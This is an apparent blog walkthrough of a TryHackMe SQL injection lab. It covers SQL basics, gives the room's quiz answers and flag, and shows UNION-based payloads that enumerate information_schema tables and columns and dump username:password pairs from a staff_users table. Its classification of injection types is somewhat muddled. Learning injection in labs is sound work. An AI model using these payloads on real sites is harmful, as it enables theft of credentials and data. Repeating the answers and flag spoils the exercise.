SQL Injection JR. Pentester -TryHackMe
Hi, amazing hackers in this story you are gonna how to what is SQL injections and how to find them in different types.
SQL injection is also defined as SQLi, an attack scenario on an application web server database by executing malicious queries in the database which results in stealing of data, modification, and deletion of customers data.
Frankly speaking, this is the most dangerous vulnerability due to unsanitized or not proper validation input from users.
What is the acronym for the software that controls a database?
Ans: DBMS
What is the name of the grid-like structure which holds the data?
Ans: table
SQL stands for Structured Query Language is used for querying the database to retrieve what information customers need with authenticated only. SQL has a list of commands that perform operations.
SQL query such as select, insert, drop, delete, create, and so on. Each command performs unique operations.
SELECT:
This command is used to retrieve data from the database.
select * from users;
It is used to select data from the users.
UNION
This command is used to combine the result of the 2 or more SELECT statements retrieve the data from single or multiple tables.
SELECT name,address,city,postcode from customers UNION SELECT company,address,city,postcode from suppliers;
INSERT
It is used to insert a new row of data into the database.
insert into users (username,password) values ('bob','password123');
UPDATE
It is used to update one or more rows of data within the table.
update users SET username='root',password='pass123' where username='admin';
DELETE
It is used to delete one or more rows of data.
delete from users where username='martin';
What SQL statement is used to retrieve data?
Ans: SELECT
What SQL clause can be used to retrieve data from multiple tables?
Ans: Union
What SQL statement is used to add data?
Ans: INSERT
What character signifies the end of an SQL query?
Ans: ;
SQL injection can be classified into 3 main types which are
In-Band SQL Injection, Error-Based SQL Injection, Union-Based SQL Injection
The practical approach to find In-band SQLi:
This type of SQL injection basically occurs when an error message is displayed directly on the browser when entering special characters.
The above practical example shows site have error-based SQL injection so next, we need to point how many columns are present in the database table
This shows we don't have one and two columns present in the table.
we have three columns in the database of the table.
In the above example, I changed id=0 instead of one because the query needs to display the data.
We find the table name in the database using 0 UNION SELECT 1,2,group_concat(table_name) FROM information_schema.tables WHERE table_schema = 'sqli_one'
We find the column name using 0 UNION SELECT 1,2,group_concat(column_name) FROM information_schema.columns WHERE table_name = 'staff_users'
Finally, we find the juicy information in the column using 0 UNION SELECT 1,2,group_concat(username,':',password SEPARATOR '<br>') FROM staff_users
What is the flag after completing level 1?
Ans : THM{SQL_INJECTION_3840}
I find the above flag by entering the martin flag displayed on the website.
Let us more types of SQL injection in the next blog for any updates click on the follow button and subscribe via email see you soon in the next blog.
